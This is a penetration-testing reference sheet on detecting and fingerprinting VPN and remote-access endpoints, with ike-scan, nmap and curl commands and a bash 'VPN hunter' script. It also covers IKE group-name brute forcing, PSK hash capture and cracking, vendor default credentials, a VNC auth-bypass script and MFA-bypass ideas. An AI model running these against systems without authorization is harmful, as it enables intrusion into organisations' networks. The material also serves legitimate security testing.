VPN & Remote Access Detection

Identifying and analyzing VPN endpoints and remote access services.

Overview

Common remote access technologies:

• IPsec VPN (IKE)
• SSL VPN (OpenVPN, Fortinet, Palo Alto)
• Citrix Gateway
• Microsoft RDP Gateway
• TeamViewer and similar remote desktop tools

IPsec VPN Detection

ike-scan

Discover and fingerprint IKE (IPsec) VPN servers.

Installation

# Debian/Ubuntu
apt install ike-scan

# Compile from source
git clone https://github.com/royhills/ike-scan.git
cd ike-scan
autoreconf --install
./configure
make
sudo make install

Basic Usage

# Scan single host
ike-scan 192.168.1.1

# Scan network range
ike-scan 192.168.1.0/24

# Verbose output
ike-scan -v 192.168.1.1

# Show backoff fingerprint
ike-scan --showbackoff 192.168.1.1

# Aggressive mode with ID
ike-scan -A -id=test 192.168.1.1

# Specify transform
ike-scan --trans=5,2,1,2 192.168.1.1

# Custom port
ike-scan --dport=4500 192.168.1.1

Vendor Fingerprinting

# Show vendor IDs
ike-scan --showbackoff --vendor 192.168.1.1

# Multiline output for better readability
ike-scan -M 192.168.1.1

# Common VPN vendors to identify:
# - Cisco
# - Fortinet
# - Palo Alto
# - SonicWall
# - Check Point
# - Juniper

Aggressive Mode

# Aggressive mode (can retrieve group names/hashes)
ike-scan -A 192.168.1.1

# With group name
ike-scan -A -id=vpngroup 192.168.1.1

# Brute force group names
for group in $(cat groups.txt); do
  ike-scan -A -id=$group 192.168.1.1
done

# Common group names:
cat > groups.txt <<EOF
vpn
remote
group
main
default
tunnel
users
EOF

PSK Cracking

# Capture PSK hash in aggressive mode
ike-scan -A -id=vpngroup 192.168.1.1 -Phandshake.txt

# Crack with psk-crack
psk-crack -d /usr/share/wordlists/rockyou.txt handshake.txt

# Or convert to Hashcat format
# Mode 5300 for IKE MD5
# Mode 5400 for IKE SHA1

Nmap IPsec Detection

# IKE version detection
nmap -sU -p 500 --script ike-version 192.168.1.1

# IKE aggressive mode
nmap -sU -p 500 --script ike-version --script-args ike-version.aggressive=true 192.168.1.1

SSL VPN Detection

OpenVPN

# Nmap detection
nmap -p 1194 --script openvpn-* 192.168.1.1

# Both TCP and UDP
nmap -sU -sT -p 1194 --script openvpn-* 192.168.1.1

# Probe with OpenVPN client
openvpn --remote 192.168.1.1 --dev null --cipher none --auth none --verb 3

Fortinet FortiGate

# Default SSL VPN port
nmap -p 443,10443 --script http-title,ssl-cert 192.168.1.1

# Look for FortiGate certificate CN
openssl s_client -connect 192.168.1.1:443 | grep "subject=CN"

# Check login page
curl -k https://192.168.1.1/remote/login

# FortiGate identifies as "FortiGate" in SSL cert

# Common ports:
# 443 - HTTPS/SSL VPN
# 10443 - Admin SSL
# 8443 - Alternative SSL

Palo Alto GlobalProtect

# Detection
nmap -p 443 --script http-title 192.168.1.1

# Check portal page
curl -k https://192.168.1.1/global-protect/login.esp

# Check gateway page
curl -k https://192.168.1.1/ssl-vpn/login.esp

# Identify via certificate
openssl s_client -connect 192.168.1.1:443 | grep "Palo Alto"

# Get config (sometimes exposed)
curl -k https://192.168.1.1/global-protect/getconfig.esp

Cisco AnyConnect

# Detection
curl -k https://192.168.1.1/ | grep -i "anyconnect"

# Check HTTPS title
nmap -p 443 --script http-title 192.168.1.1

# XML endpoint
curl -k https://192.168.1.1/+CSCOE+/saml/sp/acs?tgname=tg

# Typical URL patterns:
# /+CSCOE+/logon.html
# /+webvpn+/index.html

Pulse Secure (Juniper)

# Detection
curl -k https://192.168.1.1/dana-na/auth/url_default/welcome.cgi

# Check for Pulse
curl -k https://192.168.1.1/ | grep -i "pulse"

# Meeting page (often exposed)
curl -k https://192.168.1.1/dana-na/meeting/meeting.cgi

# Admin login
curl -k https://192.168.1.1/admin

SonicWall SSL VPN

# Detection
curl -k https://192.168.1.1/cgi-bin/welcome

# Login page
curl -k https://192.168.1.1/ | grep -i "sonicwall"

# Version disclosure
curl -k https://192.168.1.1/cgi-bin/jarrewrite.sh

Citrix Detection

Citrix Gateway

# Nmap scripts
nmap -p 443 --script citrix-* 192.168.1.1

# Citrix enumeration
nmap -p 443 --script citrix-enum-servers,citrix-enum-apps 192.168.1.1

# Check for Citrix
curl -k https://192.168.1.1/vpn/index.html | grep -i citrix

# XML Service (may expose usernames)
curl -k https://192.168.1.1/Citrix/XenApp/auth/login.aspx

# Common endpoints:
# /vpn/index.html
# /Citrix/XenApp
# /Citrix/StoreWeb
# /Citrix/Store/discovery

Citrix ADC (NetScaler)

# Nmap detection
nmap -p 443 --script http-title,http-headers 192.168.1.1

# Version disclosure
curl -k https://192.168.1.1/vpn/index.html -I | grep -i "NS-"

# Cookie detection
curl -k https://192.168.1.1/ -I | grep "NSC_"

# Common vulnerabilities to check:
# - Citrix Bleed (CVE-2023-4966)
# - Authentication bypass

RDP Gateway

Detection

# RDP Gateway port
nmap -p 3389,443 192.168.1.1

# Check for RD Web
curl -k https://192.168.1.1/rdweb

# RDP Gateway header
curl -k https://192.168.1.1/ -I | grep "RDG"

# RPC over HTTPS
nmap -p 443 --script ssl-cert 192.168.1.1 | grep "RDG"

Remote Desktop Tools

TeamViewer

# Default port
nmap -p 5938 192.168.1.1

# Alternative ports
nmap -p 5938,443,80 192.168.1.1

# Check service
nc -v 192.168.1.1 5938

VNC

# VNC ports
nmap -p 5900-5910 192.168.1.1

# VNC authentication check
nmap -p 5900 --script vnc-info,vnc-title 192.168.1.1

# RealVNC
nmap -p 5900 --script realvnc-auth-bypass 192.168.1.1

# No authentication
nmap -p 5900 --script vnc-info --script-args unsafe=1 192.168.1.1

Automated VPN Discovery

VPN Hunter Script

#!/bin/bash
TARGET="$1"

echo "[+] Scanning for VPN services on $TARGET"

# IPsec
echo -e "\n[*] Checking IPsec VPN"
ike-scan -M $TARGET 2>/dev/null | grep -q "1 returned handshake" && echo "[+] IPsec VPN detected"

# OpenVPN
echo -e "\n[*] Checking OpenVPN"
nmap -sU -p 1194 $TARGET 2>/dev/null | grep -q "open" && echo "[+] OpenVPN detected on UDP/1194"

# SSL VPN vendors
echo -e "\n[*] Checking SSL VPN vendors"

# Fortinet
curl -sk https://$TARGET/remote/login 2>/dev/null | grep -q "FortiGate" && echo "[+] FortiGate SSL VPN detected"

# Palo Alto
curl -sk https://$TARGET/global-protect/login.esp 2>/dev/null | grep -q "GlobalProtect" && echo "[+] Palo Alto GlobalProtect detected"

# Cisco
curl -sk https://$TARGET/ 2>/dev/null | grep -qi "anyconnect" && echo "[+] Cisco AnyConnect detected"

# Pulse
curl -sk https://$TARGET/dana-na/auth/url_default/welcome.cgi 2>/dev/null | grep -q "Pulse" && echo "[+] Pulse Secure detected"

# Citrix
curl -sk https://$TARGET/vpn/index.html 2>/dev/null | grep -qi "citrix" && echo "[+] Citrix Gateway detected"

# RDP Gateway
curl -sk https://$TARGET/rdweb 2>/dev/null | grep -q "RDWeb" && echo "[+] RDP Gateway detected"

echo -e "\n[+] VPN scan complete"

VPN Vulnerability Scanning

Common Issues to Check

# Weak ciphers
nmap --script ssl-enum-ciphers -p 443 192.168.1.1

# Default credentials
# Fortinet: admin/(blank) or admin/admin
# Palo Alto: admin/admin
# Pulse: admin/admin123

# Information disclosure
curl -k https://192.168.1.1/api/v1/version
curl -k https://192.168.1.1/dana-na/nc/nc_gina_ver.txt

# Known CVEs
nmap -p 443 --script vuln 192.168.1.1

MFA Bypass Testing

Check for: - Legacy authentication endpoints - API without MFA - Race conditions - Session fixation - Remember me bypasses

Useful Links

• ike-scan GitHub
• psk-crack Tool
• VPN Exploitation Resources
• Fortinet Exploitation
• Citrix Vulnerabilities
• Pulse Secure Exploitation

Quick Reference

# IPsec VPN discovery
ike-scan 192.168.1.0/24

# Aggressive mode with group name
ike-scan -A -id=vpngroup 192.168.1.1

# SSL VPN fingerprinting
curl -k https://192.168.1.1/ | grep -iE "fortinet|palo alto|cisco|pulse|citrix|sonicwall"

# Check common SSL VPN ports
nmap -p 443,10443,8443,4443 192.168.1.1

# Citrix enumeration
nmap -p 443 --script citrix-enum-* 192.168.1.1

# VNC discovery
nmap -p 5900-5910 --script vnc-* 192.168.1.0/24